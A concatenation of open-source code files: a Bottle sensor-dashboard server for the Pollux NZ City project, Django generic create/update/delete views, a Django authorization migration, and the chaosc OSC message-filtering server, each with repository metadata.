<link rel="stylesheet" type="text/css" href="/css/basic.css" />
<!-- 1. Add these JavaScript inclusions in the head of your page -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script src="http://cdn.jquerytools.org/1.2.5/tiny/jquery.tools.min.js"></script>
<script type="text/javascript" src="/js/highcharts.js"></script>
<!-- 1a) Optional: add a theme file
<script type="text/javascript" src="/js/themes/gray.js"></script>-->
<!-- 2. Add the JavaScript to initialize the chart on document ready -->
<script type="text/javascript">
var refreshRate = 30000 ;
var infoBulle = true ;
$(function() {
// setup ul.tabs to work as tabs for each div directly under div.panes
$("ul.tabs").tabs("div.panes > div");
});
Highcharts.setOptions({
global: {
useUTC: false
}
});
var chart;
$(document).ready(function() {
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container0',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/luminosity.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Lumière'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Lumière',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/luminosity.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart1 = new Highcharts.Chart({
chart: {
renderTo: 'container1',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/temperature.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Température'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Température',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/temperature.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart2 = new Highcharts.Chart({
chart: {
renderTo: 'container2',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/humidity.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Humidité'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Humidité',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/humidity.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container3',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/noise.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Bruit'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Bruit',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/noise.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container4',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/air_quality.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Qualité de l\\'air'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Qualité de l\\'air',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/air_quality.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
chart0 = new Highcharts.Chart({
chart: {
renderTo: 'container5',
defaultSeriesType: 'spline',
marginRight: 10,
events: {
load: function() {
// set up the updating of the chart each second
var series = this.series[0];
setInterval(function() {
var x = (new Date()).getTime(); // current time
var y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/pressure.json",
async:false,
dataType:"json",
success:function(data){
y = data[0];
}
});
series.addPoint([x, y], true, true);
}, refreshRate);
}
}
},
title: {
text: 'Pression de l\\'air'
},
xAxis: {
type: 'datetime',
tickPixelInterval: 150
},
yAxis: {
title: {
text: 'Value'
},
plotLines: [{
value: 0,
width: 1,
color: '#808080'
}]
},
tooltip: {
enabled: infoBulle,
formatter: function() {
return '<b>'+ this.series.name +'</b><br/>'+
Highcharts.dateFormat('%%Y-%%m-%%d %%H:%%M:%%S', this.x) +'<br/>'+
Highcharts.numberFormat(this.y, 2);
}
},
legend: {
enabled: false
},
exporting: {
enabled: false
},
series: [{
name: 'Pression de l\\'air',
data: (function() {
// generate an array of random data
var data = [],
time = (new Date()).getTime(),
i, y = 0;
jQuery.ajax({
url:"/pull/pollux/%(uuid)s/pressure.json",
async:false,
dataType:"json",
success:function(data){
y = data;
}
});
for (i = -19; i <= 0; i++) {
data.push({
x: time + i * 1000,
y: y[i*-1]
});
}
return data;
})()
}]
});
});
</script>
</head>
<body>
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
<!-- the tabs -->
<ul class="tabs">
<li><a href="#1">Lumière</a></li>
<li><a href="#2">Température</a></li>
<li><a href="#3">Humidité</a></li>
<li><a href="#4">Bruit</a></li>
<li><a href="#5">Qualité de l\'air</a></li>
<li><a href="#6">Pression de l\'air</a></li>
</ul>
<br />
<br />
<!-- tab "panes" -->
<div class="panes">
<div><div id="container0" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container1" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container2" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container3" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container4" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
<div><div id="container5" style="width: 800px; height: 400px; margin: 0 auto"></div></div>
</div>
<div id="footer">
<hr />
Pollux'NZ City Project by <a href="http://hackable-devices.org">CKAB</a>
</div>
</body>
</html>
"""
_INDEX_TEMPLATE="""
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<link rel="stylesheet" type="text/css" href="/css/basic.css" />
<head>
<title>PolluxNZCity</title>
</head>
<body>
<div id="head">
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
</div>
<div id="main">
<ul>
%s
</ul>
</div>
<div id="foot">Pollux'NZCity project</div>
</body>
</html>
"""
@route('/push/pollux/:serial:/values')
def push_data(serial="none"):
    """
    this is the URL that calls the arduino:
    /push/pollux/5d47051f-d265-4e85-9316-b662ed3041f/values?a=0074&l=3890&n=0020&h=0349&p=10167&t=291
    where t = temperature (21 degC = 210)
          p = pressure (*100 in pascal)
          a = air quality
          l = luminosity (lux)
          n = noise sensor
          h = humidity

    Values are converted through _SENSOR_FUNCTORS and appended to the
    in-memory ``data[serial]`` lists, each capped at the last 25 samples.
    Always returns the literal string 'OK'.
    """
    log.debug('serial id is : %s' % serial)
    log.debug('got: a=%(a)s, l=%(l)s, n=%(n)s, h=%(h)s, t=%(t)s, p=%(p)s' % request.GET)
    # NOTE(review): this checks that *any* sensor has pushed before, not that
    # this serial exists -- a second board's first push would hit
    # data[serial] with a KeyError; confirm against deployment assumptions.
    if len(data) != 0:
        for k in data[serial]:
            if k in request.GET:
                try:
                    # convert the raw integer, then trim history to 25 samples
                    data[serial][k].append(_SENSOR_FUNCTORS[k](int(request.GET[k])))
                    if len(data[serial][k]) > 25:
                        data[serial][k] = data[serial][k][-25:]
                except KeyError:
                    # unknown sensor letter: store the raw value unconverted
                    data[serial][k].append(int(request.GET[k]))
    else:
        # first push ever: seed the per-serial dict from the query string
        try:
            data[serial] = dict([(k,[_SENSOR_FUNCTORS[k](int(v))]) if k in _SENSOR_FUNCTORS.keys() else (k,[int(v)]) for k,v in request.GET.iteritems() ])
        except KeyError:
            data[serial] = dict([(k,[int(v)]) for k,v in request.GET.iteritems()])
    log.debug('data global is : %s ' % data)
    return 'OK'
@route('/pull/pollux/:serial:')
def visualize(serial):
    """Render the Highcharts page for one sensor board.

    Falls back to an error page when the given serial has never pushed
    any data to the platform.
    """
    # guard clause: unknown serial -> static error page
    if serial not in data:
        return """
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>PolluxNZCity</title>
</head>
<body>
<div id="head">
<a href="/"><img src="/img/polluxnzcity.png" alt="Logo Pollux NZ City" /></a>
</div>
<div id="main">
ERROR: This sensor did not send data to the platform.
</div>
<div id="foot">Pollux'NZCity project</div>
</body>
</html>
"""
    return _SENSOR_TEMPLATE % {"uuid": serial}
@route('/pull/pollux/:serial:/:sensor:.json')
def pull_sensor(serial, sensor):
    """Return one sensor's history as a JSON array of string-formatted values.

    ``sensor`` is the long name (e.g. ``temperature``) mapped through
    _SENSOR_PATH.  Newest value first.  When fewer than 20 samples exist
    the array is right-padded with '0' so charts always get 20 points.

    Fixes: the padded payload was previously computed twice (once for a
    leftover debug ``print`` to stdout, once for the return value); the
    stray print is removed and the padding is computed a single time.
    """
    values = [str(i) for i in data[serial][_SENSOR_PATH[sensor]]]
    values.reverse()
    log.debug("content: %s" % values)
    if len(values) < 20:
        # pad with zeros so the chart always receives at least 20 points
        values = values + (20 - len(values)) * ['0']
    return '[' + ','.join(values) + ']'
@route('')
@route('/')
@route('/index.html')
def index():
    """Landing page: one list item per sensor board that has pushed data."""
    items = [
        " <li> PolluxNZCity sensor whose uuid is <a href='/pull/pollux/%s'>%s</a> </li>\n" % (uuid, uuid)
        for uuid in data.keys()
    ]
    listing = "".join(items)
    if not listing:
        # no board has reported yet -- show a placeholder message
        listing = "<h1>No sensor has sent data to the platform.</h1>\nPlease wait for new data to come..."
    return _INDEX_TEMPLATE % listing
@route('/img/:img:')
def get_img(img):
    # Serve the logo and other images from the local img/ directory.
    return static_file(img, root="img/")
@route('/css/:css:')
def get_css(css):
    # Serve stylesheets referenced by the HTML templates above.
    return static_file(css, root="css/")
@route('/js/:js:')
def get_js(js):
    # Serve the bundled JavaScript (highcharts.js and friends).
    return static_file(js, root="js/")
@route('/favicon.ico')
def favicon():
    # No favicon is shipped; answer with an empty body instead of a 404.
    return ""
def init_service(host_addr, host_port, dbg=True):
    """Enable/disable bottle debug mode and start the blocking HTTP server."""
    debug(dbg)
    run(host=host_addr, port=host_port)
if __name__ == '__main__':
    # NOTE(review): ``global`` at module top level is a no-op -- log and data
    # are module globals regardless.  Kept as-is.
    global log
    global data
    # in-memory store: {serial: {sensor_letter: [values...]}}; lost on restart
    data = {}
    parser = OptionParser()
    parser.add_option("-H", "--host", dest="hostname",
        help="IP address to start the service on", metavar="HOST", default="0.0.0.0")
    parser.add_option("-p", "--port", dest="port",
        help="Port to start the service on", metavar="PORT", default="8000")
    parser.add_option("-v", "--verbose",
        action="store_true", dest="verbose", default=False,
        help="print more information messages to stdout")
    (options, args) = parser.parse_args()
    # verbose flag controls the logging threshold for the whole process
    if options.verbose == True : level=logging.DEBUG
    else: level=logging.ERROR
    logging.basicConfig(stream=sys.stdout, level=level)
    log = logging.getLogger('polluxinthecloud')
    log.debug("starting service...")
    # NOTE(review): options.port is a string here -- presumably bottle's
    # run() accepts it; confirm.
    init_service(options.hostname, options.port, dbg=options.verbose)
|
guyzmo/PolluxNZcity_PoC
|
PolluxInTheCloud/polluxinthecloud.py
|
Python
|
gpl-3.0
| 19,860
|
import six
from django.forms.models import ModelFormMetaclass, ModelForm
from django.template import loader
from django.http import Http404, HttpResponse, HttpResponseRedirect
from django.core.exceptions import ObjectDoesNotExist, ImproperlyConfigured
from django.utils.translation import ugettext
from django.contrib.auth.views import redirect_to_login
from django.views.generic import GenericViewError
from django.contrib import messages
def apply_extra_context(extra_context, context):
    """
    Adds items from extra_context dict to context. If a value in extra_context
    is callable, then it is called and the result is added to context.

    Fixes: dropped the unnecessary ``six.iteritems`` indirection --
    ``dict.items()`` iterates identically on both Python 2 and Python 3,
    so the compatibility shim added nothing here.
    """
    for key, value in extra_context.items():
        # callables are evaluated now so extra_context can carry lazily
        # computed, per-request values
        context[key] = value() if callable(value) else value
def get_model_and_form_class(model, form_class):
    """
    Returns a model and form class based on the model and form_class
    parameters that were passed to the generic view.

    If ``form_class`` is given then its associated model will be returned along
    with ``form_class`` itself. Otherwise, if ``model`` is given, ``model``
    itself will be returned along with a ``ModelForm`` class created from
    ``model``.

    Raises ``GenericViewError`` when neither argument is supplied.
    """
    if form_class:
        # the form already knows its model via its Meta options
        return form_class._meta.model, form_class
    if model:
        # The inner Meta class fails if model = model is used for some reason.
        tmp_model = model
        # TODO: we should be able to construct a ModelForm without creating
        # and passing in a temporary inner class.
        class Meta:
            model = tmp_model
        class_name = model.__name__ + 'Form'
        # build <Model>Form dynamically via the ModelForm metaclass
        form_class = ModelFormMetaclass(
            class_name, (ModelForm,), {'Meta': Meta})
        return model, form_class
    raise GenericViewError("Generic view must be called with either a model or"
                           " form_class argument.")
def redirect(post_save_redirect, obj):
    """
    Return an ``HttpResponseRedirect`` for *obj* after a save.

    ``post_save_redirect`` should be a string, and can contain named string-
    substitution place holders of ``obj`` field names.

    When ``post_save_redirect`` is falsy, fall back to the object's
    ``get_absolute_url()``; when neither source yields a URL, raise
    ``ImproperlyConfigured``.  Used by the ``create_object`` and
    ``update_object`` views to resolve their post_save_redirect parameter.
    """
    if post_save_redirect:
        # resolve %(field)s placeholders against the object's attributes
        target = post_save_redirect % obj.__dict__
        return HttpResponseRedirect(target)
    if hasattr(obj, 'get_absolute_url'):
        return HttpResponseRedirect(obj.get_absolute_url())
    raise ImproperlyConfigured(
        "No URL to redirect to. Either pass a post_save_redirect"
        " parameter to the generic view or define a get_absolute_url"
        " method on the Model.")
def lookup_object(model, object_id, slug, slug_field):
    """
    Return the ``model`` object with the passed ``object_id``. If
    ``object_id`` is None, then return the object whose ``slug_field``
    equals the passed ``slug``. If ``slug`` and ``slug_field`` are not passed,
    then raise Http404 exception.

    Raises ``GenericViewError`` when neither an id nor a slug/slug_field
    pair is supplied, and ``Http404`` when no matching row exists.
    """
    lookup_kwargs = {}
    if object_id:
        # look up by primary key, whatever the pk field is actually named
        lookup_kwargs['%s__exact' % model._meta.pk.name] = object_id
    elif slug and slug_field:
        lookup_kwargs['%s__exact' % slug_field] = slug
    else:
        raise GenericViewError(
            "Generic view must be called with either an object_id or a"
            " slug/slug_field.")
    try:
        return model.objects.get(**lookup_kwargs)
    except ObjectDoesNotExist:
        raise Http404("No %s found for %s"
                      % (model._meta.verbose_name, lookup_kwargs))
def create_object(
        request, model=None, template_name=None,
        template_loader=loader, extra_context=None, post_save_redirect=None,
        login_required=False, context_processors=None, form_class=None):
    """
    Generic object-creation function.

    Templates: ``<app_label>/<model_name>_form.html``
    Context:
        form
            the form for the object

    On a valid POST the object is saved, a success message is queued and a
    redirect is returned (see ``redirect``).  On GET, or an invalid POST,
    the bound/unbound form is re-rendered.
    NOTE(review): ``context_processors`` is accepted but never used in this
    implementation.
    """
    if extra_context is None:
        extra_context = {}
    if login_required and not request.user.is_authenticated():
        return redirect_to_login(request.path)
    model, form_class = get_model_and_form_class(model, form_class)
    if request.method == 'POST':
        form = form_class(request.POST, request.FILES)
        if form.is_valid():
            new_object = form.save()
            msg = ugettext("The %(verbose_name)s was created successfully.") %\
                {"verbose_name": model._meta.verbose_name}
            messages.success(request, msg, fail_silently=True)
            return redirect(post_save_redirect, new_object)
    else:
        form = form_class()
    # Create the template, context, response
    if not template_name:
        template_name = "%s/%s_form.html" % (
            model._meta.app_label, model._meta.object_name.lower())
    t = template_loader.get_template(template_name)
    c = {
        'form': form,
    }
    apply_extra_context(extra_context, c)
    return HttpResponse(t.render(context=c, request=request))
def update_object(
        request, model=None, object_id=None, slug=None,
        slug_field='slug', template_name=None, template_loader=loader,
        extra_context=None, post_save_redirect=None, login_required=False,
        context_processors=None, template_object_name='object',
        form_class=None):
    """
    Generic object-update function.

    Templates: ``<app_label>/<model_name>_form.html``
    Context:
        form
            the form for the object
        object
            the original object being edited

    The target object is resolved through ``lookup_object`` (by id or by
    slug).  On a valid POST the form is saved, a success message queued and
    a redirect returned; otherwise the (possibly invalid) form is rendered.
    NOTE(review): ``context_processors`` is accepted but never used.
    """
    if extra_context is None:
        extra_context = {}
    if login_required and not request.user.is_authenticated():
        return redirect_to_login(request.path)
    model, form_class = get_model_and_form_class(model, form_class)
    obj = lookup_object(model, object_id, slug, slug_field)
    if request.method == 'POST':
        form = form_class(request.POST, request.FILES, instance=obj)
        if form.is_valid():
            obj = form.save()
            msg = ugettext("The %(verbose_name)s was updated successfully.") %\
                {"verbose_name": model._meta.verbose_name}
            messages.success(request, msg, fail_silently=True)
            return redirect(post_save_redirect, obj)
    else:
        form = form_class(instance=obj)
    if not template_name:
        template_name = "%s/%s_form.html" % (
            model._meta.app_label, model._meta.object_name.lower())
    t = template_loader.get_template(template_name)
    c = {
        'form': form,
        template_object_name: obj,
    }
    apply_extra_context(extra_context, c)
    response = HttpResponse(t.render(context=c, request=request))
    return response
def delete_object(
        request, model, post_delete_redirect, object_id=None,
        slug=None, slug_field='slug', template_name=None,
        template_loader=loader, extra_context=None, login_required=False,
        context_processors=None, template_object_name='object'):
    """
    Generic object-delete function.

    The given template will be used to confirm deletetion if this view is
    fetched using GET; for safty, deletion will only be performed if this
    view is POSTed.

    Templates: ``<app_label>/<model_name>_confirm_delete.html``
    Context:
        object
            the original object being deleted

    NOTE(review): ``context_processors`` is accepted but never used.
    """
    if extra_context is None:
        extra_context = {}
    if login_required and not request.user.is_authenticated():
        return redirect_to_login(request.path)
    obj = lookup_object(model, object_id, slug, slug_field)
    if request.method == 'POST':
        # actual deletion only on POST, then redirect with a success message
        obj.delete()
        msg = ugettext("The %(verbose_name)s was deleted.") %\
            {"verbose_name": model._meta.verbose_name}
        messages.success(request, msg, fail_silently=True)
        return HttpResponseRedirect(post_delete_redirect)
    else:
        # GET: render the confirmation page instead of deleting
        if not template_name:
            template_name = "%s/%s_confirm_delete.html" % (
                model._meta.app_label, model._meta.object_name.lower())
        t = template_loader.get_template(template_name)
        c = {
            template_object_name: obj,
        }
        apply_extra_context(extra_context, c)
        response = HttpResponse(t.render(context=c, request=request))
        return response
|
Karaage-Cluster/karaage-debian
|
karaage/common/create_update.py
|
Python
|
gpl-3.0
| 8,549
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-09-14 18:48
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: updates the choices metadata (and keeps
    # max_length=100) of Authorization.authorization_codename.  Choice labels
    # are in French; choices changes do not alter the database schema itself.

    dependencies = [
        ('authorization', '0004_auto_20170628_1323'),
    ]

    operations = [
        migrations.AlterField(
            model_name='authorization',
            name='authorization_codename',
            field=models.CharField(choices=[('royalty_reports:can_consult_royalty_reports', 'Consulter les rapports de redevances'), ('editor:can_edit_journal_information', 'Modifier la page À propos'), ('authorization:can_manage_authorizations', 'Autorisations'), ('subscriptions:can_manage_individual_subscription', 'Gérer les abonnements '), ('editor:can_manage_issuesubmission', 'Déposer des fichiers de production'), ('subscriptions:can_manage_organisation_members', 'Gérer les membres d’un abonnement'), ('subscriptions:can_manage_organisation_subscription_information', 'Gérer les informations d’un abonnement'), ('subscriptions:can_manage_organisation_subscription_ips', 'Gérer les adresses IP de l’abonnement'), ('editor:can_review_issuesubmission', 'Valider les numéros')], max_length=100, verbose_name='Autorisation'),
        ),
    ]
|
erudit/zenon
|
eruditorg/core/authorization/migrations/0005_auto_20170914_1348.py
|
Python
|
gpl-3.0
| 1,272
|
# -*- coding: utf-8 -*-
"""This module implements the standalone filtering tool in the chaosc framework.
It uses the chaosc osc_lib but does not depend on chaosc features, so it can
be used with other osc compatible gear.
We provide here osc message filtering based on python regex defined in a file
and a very flexible transcoding toolchain, but it's up to your python skills
to master them. The TranscoderBaseHandler subclasses should be defined in the
appropriate python module you place in the config directory. Please refer for
a howto/examples to our comprehensive docs or look into the provided example
transcoding.py file.
"""
# This file is part of chaosc
#
# chaosc is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# chaosc is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with chaosc. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright (C) 2012-2014 Stefan Kögl
from __future__ import absolute_import
import sys, os, os.path, re, atexit
from operator import itemgetter
from datetime import datetime
from chaosc.simpleOSCServer import SimpleOSCServer
import chaosc._version
from chaosc.argparser_groups import ArgParser
from chaosc.lib import resolve_host
class FilterOSCServer(SimpleOSCServer):
    """OSC filtering/transcoding middleware

    Receives OSC messages, matches their address against the current scene's
    whitelist/blacklist regexes (loaded from ``filter_<n>.config`` files) and
    forwards surviving packets verbatim to the configured forward address.
    Scene switching is driven by the /scene, /forward and /back addresses.
    """
    def __init__(self, args):
        """ctor for filter server

        loads scene filters

        :param args: return value of argparse.parse_args
        :type args: namespace object
        """
        print "%s: starting up chaosc_filter-%s..." % (datetime.now().strftime("%x %X"), chaosc._version.__version__)
        SimpleOSCServer.__init__(self, args)
        self.forward_address = resolve_host(args.forward_host, args.forward_port)
        self.config_dir = args.filtering_config_dir
        # a "scene" is a (whitelist, blacklist) pair of compiled-regex lists
        self.scene = (list(), list())
        self.scenes = [self.scene,]
        self.scene_id = 0
        self.load_filters()
    def load_filters(self):
        # Scan config_dir for files named filter_<sceneno>.config; each line
        # has the form "whitelist=<regex>" or "blacklist=<regex>".
        now = datetime.now().strftime("%x %X")
        print "%s: loading filter configs..." % now
        regex = re.compile("filter_(\d+)\.config")
        scene_filters = list()
        for i in os.listdir(self.config_dir):
            regex_res = regex.match(i)
            if (regex_res is not None and
                    os.path.isfile(os.path.join(self.config_dir, i))):
                scene_filters.append((regex_res.group(1), i))
        if not scene_filters:
            return
        # NOTE(review): group(1) is a string, so this sort and the comparison
        # below are lexicographic/str-vs-int, not numeric -- confirm intent.
        scene_filters.sort(key=itemgetter(0))
        if scene_filters[0][0] > len(scene_filters):
            print "Warning: some filter config files for scenes are missing. " \
                "Your scene filters will be out of sync!"
        for ix, scene_filter in scene_filters:
            print "%s: loading filter config for scene %s..." % (now, ix)
            lines = open(
                os.path.join(self.config_dir, scene_filter)).readlines()
            for line in lines:
                liste, regex = line.strip("\n").strip().split("=")
                if liste == "blacklist":
                    # NOTE(review): entries from every config file are appended
                    # to self.scene (scene 0), not to the scene ``ix`` the file
                    # belongs to, while an *empty* scene is appended to
                    # self.scenes below -- looks suspicious; verify.
                    self.scene[1].append(re.compile(regex))
                else:
                    self.scene[0].append(re.compile(regex))
                print "%s: new %s entry = %r..." % (
                    datetime.now().strftime("%x %X"), liste, regex)
            self.scenes.append((list(), list()))
        print "%s: loaded %d scenes" % (now, len(scene_filters))
    def filter(self, osc_address):
        # True iff the address matches some whitelist regex of the current
        # scene and no blacklist regex; default (no whitelist hit) is drop.
        send = False
        #whitelist checks
        for predicate in self.scene[0]:
            if predicate.match(osc_address):
                send = True
                break
        #blacklist checks
        for predicate in self.scene[1]:
            if predicate.match(osc_address):
                send = False
                break
        return send
    def dispatchMessage(self, osc_address, typetags, args, packet,
            client_address):
        """Handles this filtering, transcoding steps and forwards the result

        :param osc_address: the OSC address string.
        :type osc_address: str
        :param typetags: the typetags of args
        :type typetags: list
        :param args: the osc message args
        :type args: list
        :param packet: the binary representation of a osc message
        :type packet: str
        :param client_address: (host, port) of the requesting client
        :type client_address: tuple
        """
        now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        # control addresses are consumed here and never forwarded
        if osc_address == "/scene":
            print "%s: switching scene from %d to %d" % (
                now, self.scene_id, args[0])
            self.scene_id = args[0]
            self.scene = self.scenes[self.scene_id]
            return
        elif osc_address == "/forward":
            self.scene_id += 1
            self.scene = self.scenes[self.scene_id]
            print "%s: switching scene forward to %d" % (now, self.scene_id)
            return
        elif osc_address == "/back":
            self.scene_id -= 1
            self.scene = self.scenes[self.scene_id]
            print "%s: switching scene back to %d" % (now, self.scene_id)
            return
        # everything else: drop unless the current scene's filters pass it,
        # then forward the original packet bytes untouched
        if not self.filter(osc_address):
            return
        self.socket.sendto(packet, self.forward_address)
def main():
    """Entry point: assemble the argument parser, start the filter server
    and register the chaosc unsubscription hook for shutdown.

    Fixes: ``add_chaosc_group``, ``add_forward_group`` and
    ``add_filtering_group`` were referenced without parentheses, so those
    bound methods were never *called* and their option groups (including
    args.forward_host/forward_port and args.filtering_config_dir, which
    FilterOSCServer.__init__ reads) were never added.
    """
    arg_parser = ArgParser("chaosc_filter")
    arg_parser.add_global_group()
    arg_parser.add_client_group()
    arg_parser.add_chaosc_group()
    arg_parser.add_subscriber_group()
    arg_parser.add_forward_group()
    arg_parser.add_filtering_group()
    args = arg_parser.finalize()
    server = FilterOSCServer(args)
    # make sure we unsubscribe from the chaosc hub on interpreter exit
    atexit.register(server.unsubscribe_me)
    server.serve_forever()
|
DerLiveCode/chaosc
|
chaosc/chaosc_filter.py
|
Python
|
gpl-3.0
| 6,118
|
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import unittest
from codeclib.fillib.util.settings import Settings
